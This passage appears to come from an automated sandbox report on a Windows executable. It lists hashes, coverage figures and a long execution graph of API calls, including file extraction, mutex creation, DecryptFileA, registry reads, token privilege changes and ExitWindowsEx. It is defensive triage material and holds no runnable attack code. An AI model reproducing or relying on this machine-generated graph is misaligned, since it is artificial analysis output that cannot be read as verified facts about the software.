                                                                                                                                                                                                                                            • Instruction ID: 1c6376c004c4087b206f5557651107300cfa7f5d9112c6ec0dbb30906fe4e8bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a2d55e14179f802beae1f631233a7f34a36e5c20c7b9e5f345267723ca35abc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37F0F9B6D0022CBBCB12DFE8DC45ADEBBBCEB48710F10419AE510E3240DB71AA518BD1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:26.9%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:967
                                                                                                                                                                                                                                            Total number of Limit Nodes:41
                                                                                                                                                                                                                                            execution_graph 2196 10d6f40 SetUnhandledExceptionFilter 2197 10d4cc0 GlobalFree 3128 10d4200 3129 10d421e 3128->3129 3130 10d420b SendMessageA 3128->3130 3130->3129 3131 10d3100 3132 10d3111 3131->3132 3133 10d31b0 3131->3133 3135 10d3149 GetDesktopWindow 3132->3135 3138 10d311d 3132->3138 3134 10d31b9 SendDlgItemMessageA 3133->3134 3139 10d3141 3133->3139 3134->3139 3141 10d43d0 6 API calls 3135->3141 3136 10d3138 EndDialog 3136->3139 3138->3136 3138->3139 3143 10d4463 SetWindowPos 3141->3143 3144 10d6ce0 4 API calls 3143->3144 3145 10d315d 6 API calls 3144->3145 3145->3139 3146 10d4bc0 3148 10d4c05 3146->3148 3149 10d4bd7 3146->3149 3147 10d4c1b SetFilePointer 3147->3149 3148->3147 3148->3149 3150 10d30c0 3151 10d30de CallWindowProcA 3150->3151 3152 10d30ce 3150->3152 3153 10d30da 3151->3153 3152->3151 3152->3153 3154 10d63c0 3155 10d6407 3154->3155 3156 10d658a CharPrevA 3155->3156 3157 10d6415 CreateFileA 3156->3157 3158 10d6448 WriteFile 3157->3158 3159 10d643a 3157->3159 3160 10d6465 CloseHandle 3158->3160 3162 10d6ce0 4 API calls 3159->3162 3160->3159 3163 10d648f 3162->3163 3164 10d6c03 3165 10d6c1e 3164->3165 3166 10d6c17 _exit 3164->3166 3167 10d6c27 _cexit 3165->3167 3168 10d6c32 3165->3168 3166->3165 3167->3168 2198 10d4ad0 2206 10d3680 2198->2206 2201 10d4aee WriteFile 2203 10d4b0f 2201->2203 2204 10d4b14 2201->2204 2202 10d4ae9 2204->2203 2205 10d4b3b SendDlgItemMessageA 2204->2205 2205->2203 2207 10d3691 MsgWaitForMultipleObjects 2206->2207 2208 10d36a9 PeekMessageA 2207->2208 2209 10d36e8 2207->2209 2208->2207 2212 10d36bc 2208->2212 2209->2201 2209->2202 2210 10d36c7 DispatchMessageA 2211 10d36d1 PeekMessageA 2210->2211 2211->2212 2212->2207 2212->2209 2212->2210 2212->2211 2213 10d4cd0 2214 10d4d0b 2213->2214 2215 10d4cf4 2213->2215 2216 10d4d02 2214->2216 2219 10d4dcb 2214->2219 2222 10d4d25 2214->2222 2215->2216 2217 10d4b60 FindCloseChangeNotification 2215->2217 2270 10d6ce0 2216->2270 2217->2216 2220 10d4dd4 SetDlgItemTextA 2219->2220 2223 10d4de3 2219->2223 2220->2223 2221 10d4e95 2222->2216 2236 10d4c37 2222->2236 2223->2216 2244 10d476d 2223->2244 2227 10d4e38 2227->2216 2253 10d4980 2227->2253 2232 10d4e64 2261 10d47e0 LocalAlloc 2232->2261 2235 10d4e6f 2235->2216 2237 10d4c4c DosDateTimeToFileTime 2236->2237 2239 10d4c88 2236->2239 2238 10d4c5e LocalFileTimeToFileTime 2237->2238 2237->2239 2238->2239 2240 10d4c70 SetFileTime 2238->2240 2239->2216 2241 10d4b60 2239->2241 2240->2239 2242 10d4b76 SetFileAttributesA 2241->2242 2243 10d4b92 FindCloseChangeNotification 2241->2243 2242->2216 2243->2242 2275 10d66ae GetFileAttributesA 2244->2275 2246 10d477b 2246->2227 2247 10d47cc SetFileAttributesA 2248 10d47db 2247->2248 2248->2227 2252 10d47c2 2252->2247 2254 10d4990 2253->2254 2255 10d49a5 2254->2255 2256 10d49c2 lstrcmpA 2254->2256 2257 10d44b9 20 API calls 2255->2257 2258 10d4a0e 2256->2258 2259 10d49ba 2256->2259 2257->2259 2258->2259 2340 10d487a 2258->2340 2259->2216 2259->2232 2262 10d480f LocalAlloc 2261->2262 2263 10d47f6 2261->2263 2266 10d480b 2262->2266 2267 10d4831 2262->2267 2264 10d44b9 20 API calls 2263->2264 2264->2266 2266->2235 2268 10d44b9 20 API calls 2267->2268 2269 10d4846 LocalFree 2268->2269 2269->2266 2271 10d6ce8 2270->2271 2272 10d6ceb 2270->2272 2271->2221 2353 10d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2272->2353 2274 10d6e26 2274->2221 2276 10d4777 2275->2276 2276->2246 2276->2247 2277 10d6517 FindResourceA 2276->2277 2278 10d656b 2277->2278 2279 10d6536 LoadResource 2277->2279 2284 10d44b9 2278->2284 2279->2278 2280 10d6544 DialogBoxIndirectParamA FreeResource 2279->2280 2280->2278 2282 10d47b1 2280->2282 2282->2247 2282->2248 2282->2252 2285 10d44fe LoadStringA 2284->2285 2286 10d455a 2284->2286 2287 10d4527 2285->2287 2288 10d4562 2285->2288 2290 10d6ce0 4 API calls 2286->2290 2313 10d681f 2287->2313 2294 10d45c9 2288->2294 2299 10d457e 2288->2299 2292 10d4689 2290->2292 2292->2282 2293 10d4536 MessageBoxA 2293->2286 2296 10d45cd LocalAlloc 2294->2296 2297 10d4607 LocalAlloc 2294->2297 2296->2286 2302 10d45f3 2296->2302 2297->2286 2309 10d45c4 2297->2309 2299->2299 2301 10d4596 LocalAlloc 2299->2301 2301->2286 2305 10d45af 2301->2305 2306 10d171e _vsnprintf 2302->2306 2303 10d462d MessageBeep 2304 10d681f 10 API calls 2303->2304 2307 10d463b 2304->2307 2330 10d171e 2305->2330 2306->2309 2310 10d67c9 EnumResourceLanguagesA 2307->2310 2312 10d4645 MessageBoxA LocalFree 2307->2312 2309->2303 2310->2312 2312->2286 2314 10d6857 GetVersionExA 2313->2314 2323 10d691a 2313->2323 2317 10d687c 2314->2317 2314->2323 2315 10d6ce0 4 API calls 2316 10d452c 2315->2316 2316->2293 2324 10d67c9 2316->2324 2318 10d68a5 GetSystemMetrics 2317->2318 2317->2323 2319 10d68b5 RegOpenKeyExA 2318->2319 2318->2323 2320 10d68d6 RegQueryValueExA RegCloseKey 2319->2320 2319->2323 2321 10d690c 2320->2321 2320->2323 2334 10d66f9 2321->2334 2323->2315 2325 10d6803 2324->2325 2326 10d67e2 2324->2326 2325->2293 2338 10d6793 EnumResourceLanguagesA 2326->2338 2328 10d67f5 2328->2325 2339 10d6793 EnumResourceLanguagesA 2328->2339 2331 10d172d 2330->2331 2332 10d173d _vsnprintf 2331->2332 2333 10d175d 2331->2333 2332->2333 2333->2309 2335 10d670f 2334->2335 2336 10d6740 CharNextA 2335->2336 2337 10d674b 2335->2337 2336->2335 2337->2323 2338->2328 2339->2325 2341 10d48a2 CreateFileA 2340->2341 2343 10d48e9 2341->2343 2344 10d4908 2341->2344 2343->2344 2345 10d48ee 2343->2345 2344->2259 2348 10d490c 2345->2348 2349 10d48f5 CreateFileA 2348->2349 2351 10d4917 2348->2351 2349->2344 2350 10d4962 CharNextA 2350->2351 2351->2349 2351->2350 2352 10d4953 CreateDirectoryA 2351->2352 2352->2350 2353->2274 3169 10d3210 3170 10d328e EndDialog 3169->3170 3171 10d3227 3169->3171 3186 10d3239 3170->3186 3172 10d3235 3171->3172 3173 10d33e2 GetDesktopWindow 3171->3173 3177 10d32dd GetDlgItemTextA 3172->3177 3178 10d324c 3172->3178 3172->3186 3175 10d43d0 11 API calls 3173->3175 3176 10d33f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3179 10d341f GetDlgItem EnableWindow 3176->3179 3176->3186 3187 10d32fc 3177->3187 3202 10d3366 3177->3202 3180 10d32c5 EndDialog 3178->3180 3181 10d3251 3178->3181 3179->3186 3180->3186 3182 10d325c LoadStringA 3181->3182 3181->3186 3183 10d327b 3182->3183 3184 10d3294 3182->3184 3190 10d44b9 20 API calls 3183->3190 3207 10d4224 LoadLibraryA 3184->3207 3185 10d44b9 20 API calls 3185->3186 3189 10d3331 GetFileAttributesA 3187->3189 3187->3202 3192 10d337c 3189->3192 3193 10d333f 3189->3193 3190->3170 3195 10d658a CharPrevA 3192->3195 3196 10d44b9 20 API calls 3193->3196 3194 10d32a5 SetDlgItemTextA 3194->3183 3194->3186 3197 10d338d 3195->3197 3198 10d3351 3196->3198 3199 10d58c8 27 API calls 3197->3199 3198->3186 3200 10d335a CreateDirectoryA 3198->3200 3201 10d3394 3199->3201 3200->3192 3200->3202 3201->3202 3203 10d33a4 3201->3203 3202->3185 3204 10d33c7 EndDialog 3203->3204 3205 10d597d 34 API calls 3203->3205 3204->3186 3206 10d33c3 3205->3206 3206->3186 3206->3204 3208 10d4246 GetProcAddress 3207->3208 3209 10d43b2 3207->3209 3210 10d425d GetProcAddress 3208->3210 3211 10d43a4 FreeLibrary 3208->3211 3213 10d44b9 20 API calls 3209->3213 3210->3211 3212 10d4274 GetProcAddress 3210->3212 3211->3209 3212->3211 3214 10d428b 3212->3214 3216 10d329d 3213->3216 3215 10d4295 GetTempPathA 3214->3215 3221 10d42e1 3214->3221 3217 10d42ad 3215->3217 3216->3186 3216->3194 3217->3217 3218 10d42b4 CharPrevA 3217->3218 3219 10d42d0 CharPrevA 3218->3219 3218->3221 3219->3221 3220 10d4390 FreeLibrary 3220->3216 3221->3220 3222 10d4a50 3223 10d4a9f ReadFile 3222->3223 3224 10d4a66 3222->3224 3225 10d4abb 3223->3225 3224->3225 3226 10d4a82 memcpy 3224->3226 3226->3225 3227 10d3450 3228 10d345e 3227->3228 3229 10d34d3 EndDialog 3227->3229 3231 10d349a GetDesktopWindow 3228->3231 3235 10d3465 3228->3235 3230 10d346a 3229->3230 3232 10d43d0 11 API calls 3231->3232 3233 10d34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3232->3233 3233->3230 3234 10d348c EndDialog 3234->3230 3235->3230 3235->3234 3236 10d6bef _XcptFilter 2354 10d4ca0 GlobalAlloc 2355 10d6a60 2372 10d7155 2355->2372 2357 10d6a65 2358 10d6a76 GetStartupInfoW 2357->2358 2359 10d6a93 2358->2359 2360 10d6aa8 2359->2360 2361 10d6aaf Sleep 2359->2361 2362 10d6ac7 _amsg_exit 2360->2362 2364 10d6ad1 2360->2364 2361->2359 2362->2364 2363 10d6b13 _initterm 2365 10d6b2e __IsNonwritableInCurrentImage 2363->2365 2364->2363 2364->2365 2367 10d6af4 2364->2367 2366 10d6bd6 _ismbblead 2365->2366 2368 10d6c1e 2365->2368 2371 10d6bbe exit 2365->2371 2377 10d2bfb GetVersion 2365->2377 2366->2365 2368->2367 2370 10d6c27 _cexit 2368->2370 2370->2367 2371->2365 2373 10d717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2373 2374 10d717a 2372->2374 2376 10d71cd 2373->2376 2374->2373 2375 10d71e2 2374->2375 2375->2357 2376->2375 2378 10d2c0f 2377->2378 2379 10d2c50 2377->2379 2378->2379 2381 10d2c13 GetModuleHandleW 2378->2381 2394 10d2caa memset memset memset 2379->2394 2381->2379 2383 10d2c22 GetProcAddress 2381->2383 2383->2379 2389 10d2c34 2383->2389 2384 10d2c8e 2386 10d2c9e 2384->2386 2387 10d2c97 CloseHandle 2384->2387 2386->2365 2387->2386 2389->2379 2392 10d2c89 2489 10d1f90 2392->2489 2506 10d468f FindResourceA SizeofResource 2394->2506 2397 10d2e30 2400 10d44b9 20 API calls 2397->2400 2398 10d2d2d CreateEventA SetEvent 2399 10d468f 7 API calls 2398->2399 2401 10d2d57 2399->2401 2402 10d2f06 2400->2402 2403 10d2d7d 2401->2403 2404 10d2d5b 2401->2404 2407 10d6ce0 4 API calls 2402->2407 2406 10d2e1f 2403->2406 2410 10d468f 7 API calls 2403->2410 2405 10d44b9 20 API calls 2404->2405 2408 10d2d6e 2405->2408 2511 10d5c9e 2406->2511 2411 10d2c62 2407->2411 2408->2402 2413 10d2d9f 2410->2413 2411->2384 2435 10d2f1d 2411->2435 2413->2404 2415 10d2da3 CreateMutexA 2413->2415 2414 10d2e3a 2416 10d2e43 2414->2416 2417 10d2e52 FindResourceA 2414->2417 2415->2406 2418 10d2dbd GetLastError 2415->2418 2537 10d2390 2416->2537 2421 10d2e6e 2417->2421 2422 10d2e64 LoadResource 2417->2422 2418->2406 2420 10d2dca 2418->2420 2423 10d2dea 2420->2423 2424 10d2dd5 2420->2424 2421->2408 2552 10d36ee GetVersionExA 2421->2552 2422->2421 2425 10d44b9 20 API calls 2423->2425 2426 10d44b9 20 API calls 2424->2426 2427 10d2dff 2425->2427 2429 10d2de8 2426->2429 2427->2406 2430 10d2e04 CloseHandle 2427->2430 2429->2430 2430->2402 2434 10d6517 24 API calls 2434->2408 2436 10d2f6c 2435->2436 2437 10d2f3f 2435->2437 2661 10d5164 2436->2661 2438 10d2f5f 2437->2438 2641 10d51e5 2437->2641 2794 10d3a3f 2438->2794 2442 10d2f71 2445 10d3041 2442->2445 2676 10d55a0 2442->2676 2447 10d6ce0 4 API calls 2445->2447 2449 10d2c6b 2447->2449 2476 10d52b6 2449->2476 2450 10d2f86 GetSystemDirectoryA 2451 10d658a CharPrevA 2450->2451 2452 10d2fab LoadLibraryA 2451->2452 2453 10d2ff7 FreeLibrary 2452->2453 2454 10d2fc0 GetProcAddress 2452->2454 2456 10d3017 SetCurrentDirectoryA 2453->2456 2457 10d3006 2453->2457 2454->2453 2455 10d2fd6 DecryptFileA 2454->2455 2455->2453 2464 10d2ff0 2455->2464 2458 10d3054 2456->2458 2459 10d3026 2456->2459 2457->2456 2726 10d621e GetWindowsDirectoryA 2457->2726 2461 10d3061 2458->2461 2737 10d3b26 2458->2737 2463 10d44b9 20 API calls 2459->2463 2461->2445 2466 10d307a 2461->2466 2746 10d256d 2461->2746 2468 10d3037 2463->2468 2464->2453 2470 10d3098 2466->2470 2757 10d3ba2 2466->2757 2813 10d6285 GetLastError 2468->2813 2470->2445 2474 10d30af 2470->2474 2815 10d4169 2474->2815 2477 10d52d6 2476->2477 2486 10d5316 2476->2486 2480 10d5300 LocalFree LocalFree 2477->2480 2482 10d52eb SetFileAttributesA DeleteFileA 2477->2482 2478 10d5374 2479 10d538c 2478->2479 3124 10d1fe1 2478->3124 2481 10d6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2484 10d2c72 2481->2484 2482->2480 2484->2384 2484->2392 2485 10d535e SetCurrentDirectoryA 2488 10d2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 10d65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 10d1f9a 2489->2490 2491 10d1f9f 2489->2491 2492 10d1ea7 15 API calls 2490->2492 2493 10d1fc0 2491->2493 2496 10d44b9 20 API calls 2491->2496 2497 10d1fd9 2491->2497 2492->2491 2494 10d1fcf ExitWindowsEx 2493->2494 2495 10d1ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 10d1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2502 10d1f0e 2495->2502 2496->2493 2497->2384 2500 10d1f6b ExitWindowsEx 2499->2500 2499->2502 2501 10d1f1f 2500->2501 2500->2502 2504 10d6ce0 4 API calls 2501->2504 2503 10d44b9 20 API calls 2502->2503 2503->2501 2505 10d1f8c 2504->2505 2505->2384 2507 10d46b6 2506->2507 2509 10d2d1a 2506->2509 2508 10d46be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 10d46df memcpy_s FreeResource 2508->2510 2509->2397 2509->2398 2510->2509 2517 10d5e17 2511->2517 2520 10d5cc3 2511->2520 2512 10d6ce0 4 API calls 2514 10d2e2c 2512->2514 2513 10d5dd0 2516 10d5dec GetModuleFileNameA 2513->2516 2513->2517 2514->2397 2514->2414 2515 10d5ced CharNextA 2515->2520 2516->2517 2518 10d5e0a 2516->2518 2517->2512 2587 10d66c8 2518->2587 2520->2513 2520->2515 2520->2517 2521 10d6218 2520->2521 2524 10d5e36 CharUpperA 2520->2524 2530 10d5f9f CharUpperA 2520->2530 2531 10d5f59 CompareStringA 2520->2531 2532 10d6003 CharUpperA 2520->2532 2533 10d5edc CharUpperA 2520->2533 2534 10d60a2 CharUpperA 2520->2534 2535 10d667f IsDBCSLeadByte CharNextA 2520->2535 2592 10d658a 2520->2592 2596 10d6e2a 2521->2596 2524->2520 2525 10d61d0 2524->2525 2526 10d44b9 20 API calls 2525->2526 2527 10d61e7 2526->2527 2528 10d61f7 ExitProcess 2527->2528 2529 10d61f0 CloseHandle 2527->2529 2529->2528 2530->2520 2531->2520 2532->2520 2533->2520 2534->2520 2535->2520 2538 10d24cb 2537->2538 2541 10d23b9 2537->2541 2539 10d6ce0 4 API calls 2538->2539 2540 10d24dc 2539->2540 2540->2408 2541->2538 2542 10d23e9 FindFirstFileA 2541->2542 2542->2538 2550 10d2407 2542->2550 2543 10d2479 2547 10d2488 SetFileAttributesA DeleteFileA 2543->2547 2544 10d2421 lstrcmpA 2545 10d24a9 FindNextFileA 2544->2545 2546 10d2431 lstrcmpA 2544->2546 2548 10d24bd FindClose RemoveDirectoryA 2545->2548 2545->2550 2546->2545 2546->2550 2547->2545 2548->2538 2549 10d658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 10d2390 5 API calls 2550->2551 2551->2550 2553 10d372d 2552->2553 2554 10d3737 2552->2554 2555 10d44b9 20 API calls 2553->2555 2566 10d39fc 2553->2566 2554->2553 2559 10d38a4 2554->2559 2554->2566 2603 10d28e8 2554->2603 2555->2566 2556 10d6ce0 4 API calls 2557 10d2e92 2556->2557 2557->2402 2557->2408 2567 10d18a3 2557->2567 2559->2553 2560 10d39c1 MessageBeep 2559->2560 2559->2566 2561 10d681f 10 API calls 2560->2561 2562 10d39ce 2561->2562 2563 10d39d8 MessageBoxA 2562->2563 2564 10d67c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2556 2568 10d18d5 2567->2568 2573 10d19b8 2567->2573 2632 10d17ee LoadLibraryA 2568->2632 2570 10d6ce0 4 API calls 2572 10d19d5 2570->2572 2572->2408 2572->2434 2573->2570 2574 10d18e5 GetCurrentProcess OpenProcessToken 2574->2573 2575 10d1900 GetTokenInformation 2574->2575 2576 10d1918 GetLastError 2575->2576 2577 10d19aa CloseHandle 2575->2577 2576->2577 2578 10d1927 LocalAlloc 2576->2578 2577->2573 2579 10d19a9 2578->2579 2580 10d1938 GetTokenInformation 2578->2580 2579->2577 2581 10d194e AllocateAndInitializeSid 2580->2581 2582 10d19a2 LocalFree 2580->2582 2581->2582 2583 10d196e 2581->2583 2582->2579 2584 10d1999 FreeSid 2583->2584 2585 10d1975 EqualSid 2583->2585 2586 10d198c 2583->2586 2584->2582 2585->2583 2585->2586 2586->2584 2590 10d66d5 2587->2590 2588 10d66f3 2588->2517 2590->2588 2591 10d66e5 CharNextA 2590->2591 2599 10d6648 2590->2599 2591->2590 2593 10d659b 2592->2593 2593->2593 2594 10d65b8 CharPrevA 2593->2594 2595 10d65ab 2593->2595 2594->2595 2595->2520 2602 10d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 10d621d 2600 10d665d IsDBCSLeadByte 2599->2600 2601 10d6668 2599->2601 2600->2601 2601->2590 2602->2598 2604 10d2a62 2603->2604 2611 10d290d 2603->2611 2605 10d2a6e GlobalFree 2604->2605 2606 10d2a75 2604->2606 2605->2606 2606->2559 2608 10d2955 GlobalAlloc 2608->2604 2609 10d2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 10d2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 10d2a80 GlobalUnlock 2611->2612 2613 10d2773 2611->2613 2612->2604 2614 10d27a3 CharUpperA CharNextA CharNextA 2613->2614 2615 10d28b2 2613->2615 2616 10d27db 2614->2616 2617 10d28b7 GetSystemDirectoryA 2614->2617 2615->2617 2618 10d28a8 GetWindowsDirectoryA 2616->2618 2619 10d27e3 2616->2619 2620 10d28bf 2617->2620 2618->2620 2625 10d658a CharPrevA 2619->2625 2621 10d28d2 2620->2621 2622 10d658a CharPrevA 2620->2622 2623 10d6ce0 4 API calls 2621->2623 2622->2621 2624 10d28e2 2623->2624 2624->2611 2626 10d2810 RegOpenKeyExA 2625->2626 2626->2620 2627 10d2837 RegQueryValueExA 2626->2627 2628 10d285c 2627->2628 2629 10d289a RegCloseKey 2627->2629 2630 10d2867 ExpandEnvironmentStringsA 2628->2630 2631 10d287a 2628->2631 2629->2620 2630->2631 2631->2629 2633 10d1826 GetProcAddress 2632->2633 2634 10d1890 2632->2634 2636 10d1889 FreeLibrary 2633->2636 2637 10d1839 AllocateAndInitializeSid 2633->2637 2635 10d6ce0 4 API calls 2634->2635 2638 10d189f 2635->2638 2636->2634 2637->2636 2639 10d185f FreeSid 2637->2639 2638->2573 2638->2574 2639->2636 2642 10d468f 7 API calls 2641->2642 2643 10d51f9 LocalAlloc 2642->2643 2644 10d522d 2643->2644 2645 10d520d 2643->2645 2647 10d468f 7 API calls 2644->2647 2646 10d44b9 20 API calls 2645->2646 2648 10d521e 2646->2648 2649 10d523a 2647->2649 2652 10d6285 GetLastError 2648->2652 2650 10d523e 2649->2650 2651 10d5262 lstrcmpA 2649->2651 2653 10d44b9 20 API calls 2650->2653 2654 10d527e 2651->2654 2655 10d5272 LocalFree 2651->2655 2660 10d5223 2652->2660 2656 10d524f LocalFree 2653->2656 2658 10d44b9 20 API calls 2654->2658 2657 10d2f4d 2655->2657 2656->2657 2657->2436 2657->2438 2657->2445 2659 10d5290 LocalFree 2658->2659 2659->2660 2660->2657 2662 10d468f 7 API calls 2661->2662 2663 10d5175 2662->2663 2664 10d517a 2663->2664 2665 10d51af 2663->2665 2667 10d44b9 20 API calls 2664->2667 2666 10d468f 7 API calls 2665->2666 2668 10d51c0 2666->2668 2669 10d518d 2667->2669 2828 10d6298 2668->2828 2669->2442 2673 10d51ce 2675 10d44b9 20 API calls 2673->2675 2674 10d51e1 2674->2442 2675->2669 2677 10d468f 7 API calls 2676->2677 2678 10d55c7 LocalAlloc 2677->2678 2679 10d55fd 2678->2679 2680 10d55db 2678->2680 2682 10d468f 7 API calls 2679->2682 2681 10d44b9 20 API calls 2680->2681 2683 10d55ec 2681->2683 2684 10d560a 2682->2684 2687 10d6285 GetLastError 2683->2687 2685 10d560e 2684->2685 2686 10d5632 lstrcmpA 2684->2686 2688 10d44b9 20 API calls 2685->2688 2689 10d564b LocalFree 2686->2689 2690 10d5645 2686->2690 2711 10d55f1 2687->2711 2691 10d561f LocalFree 2688->2691 2692 10d5696 2689->2692 2694 10d565b 2689->2694 2690->2689 2714 10d55f6 2691->2714 2693 10d589f 2692->2693 2695 10d56ae GetTempPathA 2692->2695 2696 10d6517 24 API calls 2693->2696 2701 10d5467 49 API calls 2694->2701 2699 10d56eb 2695->2699 2700 10d56c3 2695->2700 2696->2714 2697 10d6ce0 4 API calls 2698 10d2f7e 2697->2698 2698->2445 2698->2450 2707 10d586c GetWindowsDirectoryA 2699->2707 2708 10d5717 GetDriveTypeA 2699->2708 2699->2714 2840 10d5467 2700->2840 2703 10d5678 2701->2703 2705 10d5680 2703->2705 2703->2714 2706 10d44b9 20 API calls 2705->2706 2706->2711 2874 10d597d GetCurrentDirectoryA SetCurrentDirectoryA 2707->2874 2712 10d5730 GetFileAttributesA 2708->2712 2724 10d572b 2708->2724 2711->2714 2712->2724 2714->2697 2715 10d597d 34 API calls 2715->2724 2716 10d5467 49 API calls 2716->2699 2717 10d2630 21 API calls 2717->2724 2719 10d57c1 GetWindowsDirectoryA 2719->2724 2720 10d658a CharPrevA 2721 10d57e8 GetFileAttributesA 2720->2721 2722 10d57fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 10d5827 SetFileAttributesA 2723->2724 2724->2707 2724->2708 2724->2712 2724->2714 2724->2715 2724->2717 2724->2719 2724->2720 2724->2723 2725 10d5467 49 API calls 2724->2725 2870 10d6952 2724->2870 2725->2724 2727 10d6249 2726->2727 2728 10d6268 2726->2728 2729 10d44b9 20 API calls 2727->2729 2730 10d597d 34 API calls 2728->2730 2732 10d625a 2729->2732 2731 10d6277 2730->2731 2733 10d6ce0 4 API calls 2731->2733 2734 10d6285 GetLastError 2732->2734 2735 10d3013 2733->2735 2736 10d625f 2734->2736 2735->2445 2735->2456 2736->2731 2738 10d3b2d 2737->2738 2738->2738 2739 10d3b72 2738->2739 2740 10d3b53 2738->2740 2941 10d4fe0 2739->2941 2742 10d6517 24 API calls 2740->2742 2743 10d3b70 2742->2743 2744 10d6298 10 API calls 2743->2744 2745 10d3b7b 2743->2745 2744->2745 2745->2461 2747 10d2583 2746->2747 2748 10d2622 2746->2748 2750 10d25e8 RegOpenKeyExA 2747->2750 2751 10d258b 2747->2751 2971 10d24e0 GetWindowsDirectoryA 2748->2971 2752 10d2609 RegQueryInfoKeyA 2750->2752 2753 10d25e3 2750->2753 2751->2753 2755 10d259b RegOpenKeyExA 2751->2755 2754 10d25d1 RegCloseKey 2752->2754 2753->2466 2754->2753 2755->2753 2756 10d25bc RegQueryValueExA 2755->2756 2756->2754 2758 10d3bec 2757->2758 2759 10d3bdb 2757->2759 2760 10d3c03 memset 2758->2760 2762 10d3d13 2758->2762 2767 10d3d7b CompareStringA 2758->2767 2768 10d3fd7 2758->2768 2769 10d3f4d 2758->2769 2770 10d3fab 2758->2770 2774 10d468f 7 API calls 2758->2774 2775 10d3f1e LocalFree 2758->2775 2776 10d3f46 LocalFree 2758->2776 2780 10d3cc7 CompareStringA 2758->2780 2791 10d3e10 2758->2791 2979 10d1ae8 2758->2979 3019 10d202a memset memset RegCreateKeyExA 2758->3019 3045 10d3fef 2758->3045 2761 10d468f 7 API calls 2759->2761 2760->2758 2761->2758 2763 10d44b9 20 API calls 2762->2763 2790 10d3d26 2763->2790 2765 10d6ce0 4 API calls 2766 10d3f60 2765->2766 2766->2470 2767->2758 2767->2768 2768->2769 3069 10d2267 2768->3069 2769->2765 2773 10d44b9 20 API calls 2770->2773 2778 10d3fbe LocalFree 2773->2778 2774->2758 2775->2758 2775->2768 2776->2769 2778->2769 2780->2758 2781 10d3e1f GetProcAddress 2783 10d3f64 2781->2783 2781->2791 2782 10d3f92 2784 10d44b9 20 API calls 2782->2784 2785 10d44b9 20 API calls 2783->2785 2786 10d3fa9 2784->2786 2787 10d3f75 FreeLibrary 2785->2787 2788 10d3f7c LocalFree 2786->2788 2787->2788 2789 10d6285 GetLastError 2788->2789 2789->2790 2790->2769 2791->2781 2791->2782 2792 10d3eff FreeLibrary 2791->2792 2793 10d3f40 FreeLibrary 2791->2793 3059 10d6495 2791->3059 2792->2775 2793->2776 2795 10d468f 7 API calls 2794->2795 2796 10d3a55 LocalAlloc 2795->2796 2797 10d3a6c 2796->2797 2798 10d3a8e 2796->2798 2799 10d44b9 20 API calls 2797->2799 2800 10d468f 7 API calls 2798->2800 2801 10d3a7d 2799->2801 2802 10d3a98 2800->2802 2803 10d6285 GetLastError 2801->2803 2804 10d3a9c 2802->2804 2805 10d3ac5 lstrcmpA 2802->2805 2811 10d2f64 2803->2811 2806 10d44b9 20 API calls 2804->2806 2807 10d3b0d LocalFree 2805->2807 2808 10d3ada 2805->2808 2809 10d3aad LocalFree 2806->2809 2807->2811 2810 10d6517 24 API calls 2808->2810 2809->2811 2812 10d3aec LocalFree 2810->2812 2811->2436 2811->2445 2812->2811 2814 10d303c 2813->2814 2814->2445 2816 10d468f 7 API calls 2815->2816 2817 10d417d LocalAlloc 2816->2817 2818 10d41a8 2817->2818 2819 10d4195 2817->2819 2821 10d468f 7 API calls 2818->2821 2820 10d44b9 20 API calls 2819->2820 2822 10d41a6 2820->2822 2823 10d41b5 2821->2823 2822->2445 2824 10d41b9 2823->2824 2825 10d41c5 lstrcmpA 2823->2825 2827 10d44b9 20 API calls 2824->2827 2825->2824 2826 10d41e6 LocalFree 2825->2826 2826->2822 2827->2826 2829 10d171e _vsnprintf 2828->2829 2839 10d62c9 FindResourceA 2829->2839 2831 10d62cb LoadResource LockResource 2832 10d6353 2831->2832 2835 10d62e0 2831->2835 2833 10d6ce0 4 API calls 2832->2833 2834 10d51ca 2833->2834 2834->2673 2834->2674 2836 10d631b FreeResource 2835->2836 2837 10d6355 FreeResource 2835->2837 2838 10d171e _vsnprintf 2836->2838 2837->2832 2838->2839 2839->2831 2839->2832 2841 10d548a 2840->2841 2860 10d551a 2840->2860 2901 10d53a1 2841->2901 2844 10d5581 2846 10d6ce0 4 API calls 2844->2846 2852 10d559a 2846->2852 2847 10d554d 2847->2844 2855 10d597d 34 API calls 2847->2855 2848 10d553b CreateDirectoryA 2853 10d5577 2848->2853 2854 10d5547 2848->2854 2849 10d5495 2849->2844 2850 10d550c 2849->2850 2851 10d54c2 GetSystemInfo 2849->2851 2856 10d658a CharPrevA 2850->2856 2858 10d54da 2851->2858 2852->2714 2864 10d2630 GetWindowsDirectoryA 2852->2864 2857 10d6285 GetLastError 2853->2857 2854->2847 2859 10d555c 2855->2859 2856->2860 2861 10d557c 2857->2861 2858->2850 2862 10d658a CharPrevA 2858->2862 2859->2844 2863 10d5568 RemoveDirectoryA 2859->2863 2912 10d58c8 2860->2912 2861->2844 2862->2850 2863->2844 2865 10d266f 2864->2865 2866 10d265e 